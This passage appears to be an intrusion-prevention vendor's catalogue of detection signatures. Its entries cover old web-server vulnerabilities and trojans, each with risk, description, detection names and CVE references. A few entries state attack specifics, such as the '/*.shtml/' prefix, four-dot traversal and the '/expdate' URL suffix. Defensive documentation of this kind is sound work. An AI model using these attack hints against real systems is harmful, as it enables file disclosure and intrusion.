Platform:	Windows
Software:	Web Server CT
Type:	Backdoor
Description:	Web Server CT is a trojan horse program that provides a backdoor to an infected system. The backdoor allows a remote attacker to control the backdoored system via a browser.
Situation:	HTTP_Web-Server-CT-Backdoor-Response HTTP_SHS-Web-Server-CT-Backdoor-Response

HTTP-BadBlue-Mfcisapicommand-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in ext.dll in BadBlue

Risk:

Moderate

First detected in:

sgpkg-ips-28-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BadBlue

Type:

Buffer Overflow

Description:

Working Resources Inc. BadBlue 2.55 contains a buffer overflow vulnerability in the ext.dll when handling data given in 'mfcisapicommand' parameter. Remote attackers can exploit this vulnerability to execute arbitrary code on the victim server.

Situation:

HTTP_CSU-BadBlue-Mfcisapicommand-Buffer-Overflow

References:

CVE-2005-0595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0595

BID-12673
http://www.securityfocus.com/bid/12673

OSVDB-14238
http://www.osvdb.org/14238

HTTP-BadBlue-PassThru-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in ext.dll in BadBlue

Risk:

Moderate

First detected in:

sgpkg-ips-642-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BadBlue

Type:

Buffer Overflow

Description:

Working Resources Inc. BadBlue 2.55 contains a stack based buffer vulnerability in the PassThru functionality in ext.dll, in BadBlue 2.72b and earlier.

Situation:

HTTP_CSU-BadBlue-Mfcisapicommand-Buffer-Overflow

References:

CVE-2007-6377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6377

BID-26803
http://www.securityfocus.com/bid/26803

OSVDB-42416
http://www.osvdb.org/42416

HTTP-Bajerie-Four-Dots-Directory-Traversal

About this vulnerability:

Bajerie HTTP web server allows directory traversal with four dots

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Bajerie HTTP Server

Type:

Directory Traversal

Description:

The Bajerie HTTP server goes into the root directory if it encounters 4 dots (....) in the URI. This allows remote attackers to display any file located on the same drive as the HTTP server.

References:

CVE-2000-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773

BID-1522
http://www.securityfocus.com/bid/1522

HTTP-Barracuda-Spam-Firewall-Img-Pl-Compromise

About this vulnerability:

Barracuda Spam Firewall allows arbitrary shell command execution

Risk:

High

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Other

Software:

Barracuda Spam Firewall

Type:

Malfunction

Description:

Barracuda Spam Firewall with version 3.1.17 firmware is vulnerable to arbitrary shell command execution. By sending suitable input to img.pl script's parameter, remote attackers can view files and execute arbitrary shell commands on the vulnerable host with the web server's privileges. A proof of concept exploit exists that extracts the firewalls admin password.

Situation:

HTTP_CSU-Barracuda-Spam-Firewall-Img-Pl-Compromise

References:

CVE-2005-2847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2847

BID-14712
http://www.securityfocus.com/bid/14712

HTTP-Barracuda-Spam-Firewall-Preview-Email-Command-Execution

About this vulnerability:

Barracuda Spam Firewall command execution and file disclosure vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-74-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Other

Software:

Barracuda Spam Firewall

Type:

Directory Traversal

Description:

The Barracuda Spam Firewall has a directory traversal vulnerability related to the preview_email.cgi script. This vulnerability allows authenticated remote attackers to view and execute arbitrary files accessible to the web server user.

Situation:

HTTP_CS-Barracuda-Spam-Firewall-Preview-Email-Command-Execution

References:

CVE-2006-4081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4081

BID-19276
http://www.securityfocus.com/bid/19276

HTTP-Basilix-Webmail-Misconfiguration

About this vulnerability:

Basilix Webmail Misconfiguration

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Basilix Webmail

Type:

Misconfiguration

Description:

The Basilix Webmail is misconfigured and allows the disclosure of files containing sensitive information.

References:

CVE-2001-1044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1044

BID-2198
http://www.securityfocus.com/bid/2198

HTTP-Bea-Interactivequery-Jsp-Cross-Site

About this vulnerability:

Cross-site scripting vulnerability in BEA WebLogic

Risk:

Low

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

BEA WebLogic

Type:

Malfunction

Description:

An example script coming with BEA WebLogic 8.1, InteractiveQuery.jsp, suffers from a cross-site scripting vulnerability. Arbitrary script code can be entered in a person parameter.

References:

CVE-2003-0624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0624

BID-8938
http://www.securityfocus.com/bid/8938

HTTP-Bea-WebLogic-Admin-Console-Cross-Site-Scripting

About this vulnerability:

Cross site scripting vulnerability in Bea WebLogic

Risk:

Moderate

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

BEA WebLogic

Type:

Code Injection

Description:

Bea WebLogic Server and WebLogic Express have a cross site scripting vulnerability. The vulnerability can be exploited to execute arbitrary script code in the browser of the target user in the context of the trusted site, which may lead to a WeLogic server administrator account compromise.

Situation:

HTTP_CSU-Bea-WebLogic-Admin-Console-Cross-Site-Scripting

References:

CVE-2005-1747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1747

BID-13793
http://www.securityfocus.com/bid/13793

OSVDB-16838
http://www.osvdb.org/16838

HTTP-Bea-WebLogic-ConsoleHelp-Source-Code-Disclosure

About this vulnerability:

Bea Weblogic server allows a malicious user to retrieve the source code of documents residing in the web root directory

Risk:

Low

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

BEA WebLogic

Type:

Insecure Configuration

Description:

An error in the default configuration allows a malicious user to retrieve the source code of documents residing in the web root directory.

References:

CVE-2000-0682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0682

BID-1518
http://www.securityfocus.com/bid/1518

OSVDB-1481
http://www.osvdb.org/1481

HTTP-Bea-WebLogic-Star-Dot-Shtml-Code-Disclosure

About this vulnerability:

Bea WebLogic code disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

BEA WebLogic

Type:

Metacharacter Injection

Description:

Certain versions of BEA Systems WebLogic servers contain a vulnerability that allows an attacker to disclose the source code of .jsp/.jhtml files residing in the web document's root directory by prefixing the request with "/*.shtml/".

References:

CVE-2000-0683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0683

BID-1517
http://www.securityfocus.com/bid/1517

OSVDB-1480
http://www.osvdb.org/1480

HTTP-Berbew-Webber-Padodor-Trojan-Log-Upload

About this vulnerability:	Upload of keystrokes log of Berbew/Webber/Padodor trojan
Risk:	Moderate
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Berbew/Webber/Padodor Trojan
Type:	Malfunction
Description:	Berbew/Webber/Padodor trojan is a program that steals financial and other account details from the user by monitoring keystrokes. The program tries to send this information to a remote adversary by using HTTP.
Situation:	HTTP_CS-Berbew-Webber-Padodor-Trojan-Log-Upload

HTTP-Big-Brother-Hostsvc-Directory-Traversal

About this vulnerability:

Big Brother Hostsvc Directory Traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Big Brother

Type:

Directory Traversal

Description:

The Big Brother bb-hostsvc.sh contains a directory traversal vulnerability which can be exploited to reveal any file on the system.

References:

CVE-2000-0638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0638

BID-1455
http://www.securityfocus.com/bid/1455

HTTP-Bigconf-File-Disclosure

About this vulnerability:

File disclosure via 'bigconf.cgi' script

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Malfunction

Description:

The bigconf.cgi script in F5 BigIP software has a vulnerability that lets a remote attacker to read arbitrary files.

Situation:

HTTP_CSU-Cgi-Bigconf-Access

References:

CVE-1999-1550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1550

BID-778
http://www.securityfocus.com/bid/778

HTTP-Bizdb1-Search-Cmd-Exec

About this vulnerability:

Command execution using CGI script bizdb1-search.cgi

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CNC Technology BizDB

Type:

Malfunction

Description:

The bizdb1-search.cgi script in BizDB Web database integration software passes the content of a dbname variable to an unchecked open() call. This vulnerability gives a remote attacker an opportunity to execute commands with the Web server privileges.

Situation:

HTTP_CRL-Cgi-Bizdb1-Search-Dbname-Usage

References:

CVE-2000-0287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0287

BID-1104
http://www.securityfocus.com/bid/1104

HTTP-Blog-Torrent-Directory-Traversal

About this vulnerability:

Blog Torrent file disclosure vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Blog Torrent

Type:

Directory Traversal

Description:

Blog Torrent version 0.8 suffers from a directory-traversal vulnerability, which allows remote attackers to download arbitrary files by sending suitable parameters to the btdownload.php file.

Situation:

HTTP_CS-Blog-Torrent-Directory-Traversal

References:

CVE-2004-1212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1212

BID-11795
http://www.securityfocus.com/bid/11795

HTTP-Bnbform-Hidden-Field-Manipulation

About this vulnerability:

Bnbform Hidden Field Manipulation

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

BNBForm

Type:

Directory Traversal

Description:

The bnbform.cgi allows the reading of arbitary files on the system using the automessage field.

Situation:

HTTP_CRL-Bnbform-Hidden-Field-Manipulation

References:

CVE-1999-0937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0937

HTTP-Browser-Usage

About this vulnerability:	Browser usage detection.
Risk:	Low
First detected in:	sgpkg-ips-28-1210
Last changed:	sgpkg-ips-1794-5242
Platform:	Generic
Software:	Generic HTTP client; Sun Java Runtime Environment
Type:	Browser
Description:	Fingerprints for detecting various browsers' user-agent strings reference this vulnerability. The usage of older browser can be a security risk because of unpatched bugs, and corporate policy may forbid the use of some browsers.
Situation:	HTTP_CSH-Firefox-Browser-Usage HTTP_CSH-Internet-Explorer-Browser-Usage HTTP_CSH-Internet-Explorer-6.x-Browser-Usage HTTP_CSH-Internet-Explorer-5.x-Browser-Usage HTTP_CSH-Internet-Explorer-4.x-Browser-Usage HTTP_CSH-Internet-Explorer-3.x-Browser-Usage HTTP_CSH-Netscape-Browser-Usage HTTP_CSH-Opera-Browser-Usage HTTP_CSH-Opera-Mini-Browser-Usage HTTP_CSH-Curl-Tool-Usage HTTP_CSH-Windows-WebDAV-Access HTTP_CSH-Libwww-Perl-User-Agent HTTP_CSH-Browser-User-Agent-Windows-2000 HTTP_CSH-Browser-User-Agent-Windows-XP HTTP_CSH-Browser-User-Agent-Windows-XP-SP2 HTTP_CSH-Browser-User-Agent-Windows-98 HTTP_CSH-Internet-Explorer-2.x-Browser-Usage HTTP_CSH-Browser-User-Agent-Windows-Vista HTTP_CSH-Browser-User-Agent-Mac-OS-X-Leopard HTTP_CSH-Microsoft-Windows-RSS-Platform-Usage HTTP_CSH-Internet-Explorer-7.x-Browser-Usage HTTP_CSH-Debian-Advanced-Packaging-Tool HTTP_CSH-Microsoft-Bing-Web-Spider HTTP_CSH-Internet-Explorer-9.x-Browser-Usage HTTP_CSH-Java-6-Version-1.6.0_08-Usage HTTP_CSH-Java-6-Version-1.6.0_07-Usage HTTP_CSH-Java-6-Version-1.6.0_06-Usage HTTP_CSH-Java-6-Version-1.6.0_05-Usage HTTP_CSH-Java-6-Version-1.6.0_04-Usage HTTP_CSH-Java-6-Version-1.6.0_03-Usage HTTP_CSH-Java-6-Version-1.6.0_02-Usage HTTP_CSH-Java-6-Version-1.6.0_01-Usage HTTP_CSH-Java-6-Version-1.6.0-Usage HTTP_CSH-Java-6-Usage HTTP_CSH-Java-6-Version-1.6.0_24-Usage HTTP_CSH-Java-6-Version-1.6.0_23-Usage HTTP_CSH-Java-6-Version-1.6.0_22-Usage HTTP_CSH-Java-6-Version-1.6.0_21-Usage HTTP_CSH-Java-6-Version-1.6.0_20-Usage HTTP_CSH-Java-6-Version-1.6.0_19-Usage HTTP_CSH-Java-6-Version-1.6.0_18-Usage HTTP_CSH-Java-6-Version-1.6.0_17-Usage HTTP_CSH-Java-6-Version-1.6.0_16-Usage HTTP_CSH-Java-6-Version-1.6.0_15-Usage HTTP_CSH-Java-6-Version-1.6.0_14-Usage HTTP_CSH-Java-6-Version-1.6.0_13-Usage HTTP_CSH-Java-6-Version-1.6.0_12-Usage HTTP_CSH-Java-6-Version-1.6.0_11-Usage HTTP_CSH-Java-6-Version-1.6.0_10-Usage HTTP_CSH-Java-6-Version-1.6.0_09-Usage HTTP_CSH-Unknown-Browser HTTP_CSH-Safari-Browser-Usage HTTP_CSH-Chrome-Browser-Usage HTTP_CSH-Iceweasel-Browser-Usage HTTP_CSH-Wget-Tool-Usage HTTP_CSH-Browser-User-Agent-Linux HTTP_CSH-Browser-User-Agent-Windows-2003 HTTP_CSH-Java-7-Version-1.7.0_07-Usage HTTP_CSH-Java-7-Version-1.7.0_06-Usage HTTP_CSH-Java-7-Version-1.7.0_05-Usage HTTP_CSH-Java-7-Version-1.7.0_04-Usage HTTP_CSH-Java-7-Version-1.7.0_03-Usage HTTP_CSH-Java-7-Version-1.7.0_02-Usage HTTP_CSH-Java-7-Version-1.7.0_01-Usage HTTP_CSH-Java-7-Usage HTTP_CSH-Java-7-Version-1.7.0_10-Usage HTTP_CSH-Java-7-Version-1.7.0_09-Usage HTTP_CSH-Java-7-Version-1.7.0_11-Usage HTTP_CSH-Nutch-Open-Source-Robot HTTP_CSH-Googlebot-Web-Spider HTTP_CSH-Yahoo-Slurp-Web-Spider HTTP_CSH-MSNBot-Media-Web-Spider HTTP_CSH-Googlebot-Image-Web-Spider HTTP_CSH-MSNBot-Web-Spider HTTP_CSH-Googlebot-Mediapartners-Web-Spider HTTP_CSH-Radian6-RSS-Feed-Crawler HTTP_CSH-Python-Urllib-Robot HTTP_CSH-Ubuntu-Advanced-Packaging-Tool HTTP_CSH-Pear-HTTP_request-Php-Extension-Package HTTP_CSH-PycURL-Crawler HTTP_CSH-Avast-Internet-Security-Syncer-User-Agent HTTP_CSH-BitDefender-Nimbus-Client-User-Agent HTTP_CSH-Internet-Explorer-8.x-Browser-Usage HTTP_CSH-Internet-Explorer-Browser-Plugin-Usage HTTP_CSH-ExB-Language-Crawler HTTP_CSH-Microsoft-WNS-Message-User-Agent HTTP_CSH-F-Secure-ORSP-Client-User-Agent HTTP_CSH-Sony-PlayStation-3-Browser-Detected HTTP_CSH-Logitech-Desktop-Messenger-Backweb-Update HTTP_CSH-Searchme-Charlotte-Web-Spider HTTP_CSH-Baiduspider-Web-Spider HTTP_CSH-DotBot-Web-Spider HTTP_CSH-Yandex-Web-Spider HTTP_CSH-Microsoft-Windows-Update-Agent-Usage HTTP_CSH-Internet-Explorer-10.x-Browser-Usage HTTP_CSH-BigBrother-User-Agent HTTP_CSH-Browser-User-Agent-Windows-8 HTTP_CSH-Browser-User-Agent-Windows-8.1 HTTP_CSH-Netcraft-Crawler HTTP_CSH-Internet-Explorer-11.x-Browser-Usage HTTP_CSH-Java-8-Usage HTTP_CSH-Joomla-JCE-Vulnerability-Crawler HTTP_CSH-Mozilla-Minefield-Browser-Usage HTTP_CSH-Sapphire-Web-Spider HTTP_CSH-Konqueror-Browser-Usage HTTP_CSH-Mozilla-SeaMonkey-Browser-Usage HTTP_CSH-Browser-User-Agent-Mac-OS-X HTTP_CSH-Jyxobot-Web-Spider HTTP_CSH-Ask-Jeeves-Teoma-Web-Spider HTTP_CSH-TurnitinBot-Web-Spider HTTP_CSH-HTTrack-Tool-Usage HTTP_CSH-Twiceler-Web-Spider HTTP_CSH-Googlebot-Mobile-Web-Spider HTTP_CSH-Google-Desktop-Usage HTTP_CSH-Browser-User-Agent-Linux-CentOS HTTP_CSH-AppleWebKit-Usage HTTP_CSH-Browser-User-Agent-Mac-OS-X-Snow-Leopard HTTP_CSH-McAfee-Web-Gateway-Usage HTTP_CSH-Browser-User-Agent-Windows-Phone-8.1 HTTP_CSH-Browser-User-Agent-Windows-Phone-8 HTTP_CSH-Browser-User-Agent-Windows-Phone-7.8 HTTP_CSH-Browser-User-Agent-Windows-Phone-7.5 HTTP_CSH-Browser-User-Agent-Windows-Phone-7 HTTP_CSH-Browser-User-Agent-Windows-Phone HTTP_CSH-Browser-User-Agent-Android HTTP_CSH-GlobalSpec-Ocelli-Web-Spider HTTP_CSH-ScoutJet-Web-Spider HTTP_CSH-Stonesoft-SMC-Usage HTTP_CSH-Generic-Java-Application HTTP_CSH-Browser-User-Agent-iPad HTTP_CSH-Browser-User-Agent-iPhone HTTP_CSH-Browser-User-Agent-Android-5.1-Tablet HTTP_CSH-Browser-User-Agent-Android-5.0-Tablet HTTP_CSH-Browser-User-Agent-Android-4.4-Tablet HTTP_CSH-Browser-User-Agent-Android-4.3-Tablet HTTP_CSH-Browser-User-Agent-Android-4.2-Tablet HTTP_CSH-Browser-User-Agent-Android-4.1-Tablet HTTP_CSH-Yahoo-MMCrawler-Web-Spider HTTP_CSH-Browser-User-Agent-Android-4.0-Tablet HTTP_CSH-Browser-User-Agent-Android-3-Tablet HTTP_CSH-Browser-User-Agent-Unidentified-Android-Version-Tablet HTTP_CSH-Browser-User-Agent-Unidentified-Android-Version-Mobile HTTP_CSH-Browser-User-Agent-Android-2-Tablet HTTP_CSH-Browser-User-Agent-Android-1-Tablet HTTP_CSH-Browser-User-Agent-Android-5.1-Mobile HTTP_CSH-NTT-Resonant-Ichiro-Mobile-Web-Spider HTTP_CSH-Lynx-Browser-Usage HTTP_CSH-NewsGator-NetNewsWire-Usage HTTP_CSH-Exalead-Exabot-Web-Spider HTTP_CSH-Swish-e-Web-Spider HTTP_CSH-Browser-User-Agent-Android-5.0-Mobile HTTP_CSH-Browser-User-Agent-Android-4.4-Mobile HTTP_CSH-Picsearch-psbot-Web-Spider HTTP_CSH-Entireweb-Speedy-Web-Spider HTTP_CSH-Browser-User-Agent-Android-4.3-Mobile HTTP_CSH-Browser-User-Agent-Android-4.2-Mobile HTTP_CSH-Browser-User-Agent-Android-4.1-Mobile HTTP_CSH-Browser-User-Agent-Android-4.0-Mobile HTTP_CSH-Browser-User-Agent-Android-3-Mobile HTTP_CSH-Browser-User-Agent-Android-2-Mobile HTTP_CSH-Browser-User-Agent-Android-1-Mobile HTTP_CSH-Internet-Explorer-8.x-Browser-Compatibility-Mode-Usage HTTP_CSH-Internet-Explorer-10.x-Browser-Compatibility-Mode-Usage HTTP_CSH-Internet-Explorer-11.x-Browser-Compatibility-Mode-Usage HTTP_CSH-Internet-Explorer-9.x-Browser-Compatibility-Mode-Usage HTTP_CSH-Browser-User-Agent-Windows-7 HTTP_CSH-Edge-Browser-Usage HTTP_CSH-Samsung-Browser-Usage HTTP_CSH-Up-To-Date-Firefox-Browser-Usage HTTP_CSH-Obsolete-Firefox-Browser-Usage HTTP_CSH-Unidentified-Firefox-Browser-Usage HTTP_CSH-Up-To-Date-Chrome-Browser-Usage HTTP_CSH-Obsolete-Chrome-Browser-Usage HTTP_CSH-Unidentified-Chrome-Browser-Usage HTTP_CSH-Up-To-Date-Edge-Browser-Usage HTTP_CSH-Obsolete-Edge-Browser-Usage HTTP_CSH-Unidentified-Edge-Browser-Usage HTTP_CSH-Obsolete-Safari-Browser-Usage HTTP_CSH-Unidentified-Safari-Browser-Usage HTTP_CSH-Up-To-Date-Safari-Browser-Usage HTTP_CSH-Tizen-Browser-Usage HTTP_CSH-Electron-Based-Application-Usage HTTP_CSH-Spotify-Usage HTTP_CSH-User-Agent-Microsoft-Symbol-Server HTTP_CSH-User-Agent-VCSoapClient HTTP_CSH-User-Agent-Windows HTTP_CSH-User-Agent-Processed HTTP_CS-MSNBot-Web-Spider

HTTP-Bugzilla-Globals-File-Disclosure

About this vulnerability:

Sensitive information disclosure in Bugzilla

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Bugzilla

Type:

Malfunction

Description:

Bugzilla stores global variables, including database username and password, in globals.pl. When requested the file may be returned by the web server without being executed, disclosing sensitive information.

Situation:

HTTP_CSU-Bugzilla-Globals-File-Disclosure

References:

CVE-2001-0330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0330

BID-2671
http://www.securityfocus.com/bid/2671

HTTP-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution

About this vulnerability:

Computer Associates eTrust Intrusion Detection has a code execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-117-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates eTrust Intrusion Detection

Type:

Malfunction

Description:

Computer Associates eTrust Intrusion Detection has a code execution vulnerability in the CallCode ActiveX control component. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution
File-Text_CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution

References:

CVE-2007-3302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3302

BID-25050
http://www.securityfocus.com/bid/25050

HTTP-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF

About this vulnerability:

A buffer overflow vulnerability in multiple Computer Associates products

Risk:

High

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Unicenter Asset Management; Computer Associates Unicenter Desktop Management Bundle; Computer Associates Unicenter Remote Control; Computer Associates Unicenter Software Delivery

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the ListCtrl ActiveX Control used in multiple Computer Associates products. The vulnerability allows execution of arbitrary code in the context of the current user.

Situation:

HTTP_SS-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF
File-Text_CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF

References:

CVE-2008-1472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1472

BID-28268
http://www.securityfocus.com/bid/28268

OSVDB-43214
http://www.osvdb.org/43214

HTTP-CA-Multiple-Products-gui_cm_ctrls-ActiveX-Control-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in multiple Computer Associates products

Risk:

Moderate

First detected in:

sgpkg-ips-158-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop and Server Management; Computer Associates Desktop Management Suite; Computer Associates Unicenter Asset Management; Computer Associates Unicenter Desktop Management Bundle; Computer Associates Unicenter Software Delivery; Computer Associates Unicenter Remote Control

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in multiple Computer Associates products. Successful exploitation allows non-privileged arbitrary code execution on a vulnerable host.

Situation:

HTTP_SS-CA-Multiple-Products-gui-cm-ctrls-ActiveX-Control-Memory-Corruption
File-Text_CA-Multiple-Products-gui-cm-ctrls-ActiveX-Control-Memory-Corruption

References:

CVE-2008-1786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1786

BID-28809
http://www.securityfocus.com/bid/28809

OSVDB-44423
http://www.osvdb.org/44423

HTTP-Cal-Make-Pl-File-Disclosure

About this vulnerability:

cal_make.pl file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

PerlCal

Type:

Input Validation

Description:

The cal_make.pl can be tricked into revealing the contents of any file on the system readable with the privileges of the web server using a directory traversal.

References:

CVE-2001-0463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0463

BID-2663
http://www.securityfocus.com/bid/2663

HTTP-Campas-Cgi-System-Compromise

About this vulnerability:

Arbitrary command-execution vulnerability in Campas sample script

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Campas

Type:

Metacharacter Injection

Description:

A sample script distributed with the NCSA httpd server, Campas, does not sufficiently validate its input. Remote attackers may execute arbitrary commands in the host by sending to the script a suitable argument separated with line feed characters.

References:

CVE-1999-0146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0146

BID-1975
http://www.securityfocus.com/bid/1975

HTTP-Carbo-Icat-Directory-Traversal

About this vulnerability:

Carbo Icat Directory Traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Cat Electronic Commerce Suite

Type:

Directory Traversal

Description:

The Carbo Icat Suite does not validate input sufficiently and because of this can be exploted to reveal any file on the system using a directory traversal attack.

References:

CVE-1999-1069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1069

BID-2126
http://www.securityfocus.com/bid/2126

HTTP-Carello-Add-Exe-File-Disclosure

About this vulnerability:

File disclosure by add.exe in Carello shopping cart

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

CarelloWeb

Type:

Malfunction

Description:

Add.exe in the Carello web shopping cart software allows remote users to duplicate files on the server. When calling add.exe with the name of an existing file, a duplicate of the file is created with a number appended to the name. For scripts, the new name is not necessarily recognized as a file format and a request will return the scripts source code.

References:

CVE-2000-0396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0396

BID-1245
http://www.securityfocus.com/bid/1245

HTTP-Carey-Internet-Services-Commerce-Directory-Traversal

About this vulnerability:

Carey Internet Services commerce.cgi Directory Traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1638-5242

Platform:

Unix

Software:

Carey Internet Services commerce.cgi

Type:

Directory Traversal

Description:

The commerce.cgi contains a vulnerability which could allow an attacker to view arbitary files on the system by using a directory traversal and the null character.

References:

CVE-2001-0210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0210

BID-2361
http://www.securityfocus.com/bid/2361

HTTP-Cart32-ClientList-Disclosure

About this vulnerability:

Disclosure of list of clients in Cart32

Risk:

Moderate

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

McMurtrey/Whitaker & Associates Cart32

Type:

Malfunction

Description:

The Cart32 shopping cart system by McMurtrey/Whitaker&Associates contains an embedded password. A remote attacker can use this vulnerability to access a list of shopping cart clients.

References:

CVE-2000-0136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0136

BID-1153
http://www.securityfocus.com/bid/1153

HTTP-Cart32-Expdate-Information-Disclosure

About this vulnerability:

Disclosure of debugging information in Cart32

Risk:

Moderate

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

McMurtrey/Whitaker & Associates Cart32

Type:

Malfunction

Description:

The Cart32 shopping cart system by McMurtrey/Whitaker&Associates allows a remote attacker to access sensitive debugging information by appending '/expdate' to the URL request.

References:

CVE-2000-0430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0430

BID-1358
http://www.securityfocus.com/bid/1358

HTTP-Cart32-Remote-Admin-Password

About this vulnerability:

Cart32 Remote Admin Password

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Cart32

Type:

Backdoor

Description:

Cart32 allows the changing of the administrative password without knowledge of the previous password.

References:

CVE-2000-0429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0429

BID-1153
http://www.securityfocus.com/bid/1153

HTTP-Catalyst-Remote-Command-Execution

About this vulnerability:

Catalyst Remote Command Execution

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Cisco CatOS

Software:

<os>

Type:

Malfunction

Description:

Cisco Catalyst 3500 XL contains a vulnerability which when exploited will allow the attacker to execute commands and view files on the system.

References:

CVE-2000-0945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0945

BID-1846
http://www.securityfocus.com/bid/1846

OSVDB-444
http://www.osvdb.org/444

HTTP-Cgi-Blackboard-User-Update

About this vulnerability:

Access validation vulnerability in Blackboard CourseInfo

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Blackboard CourseInfo

Type:

Malfunction

Description:

Blackboard CourseInfo has an access validation vulnerability in the user_update_admin.pl and user_update_passwd.pl scripts. If a user has an existing account on Blackboard CourseInfo, the user is able to modify the information on the database and gain privileges by running these scripts.

References:

CVE-2000-0627
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0627

BID-1486
http://www.securityfocus.com/bid/1486

HTTP-Cgi-Cal_make.pl-Directory-Traversal

About this vulnerability:

Directory traversal file disclosure in Cal_make.pl

Risk:

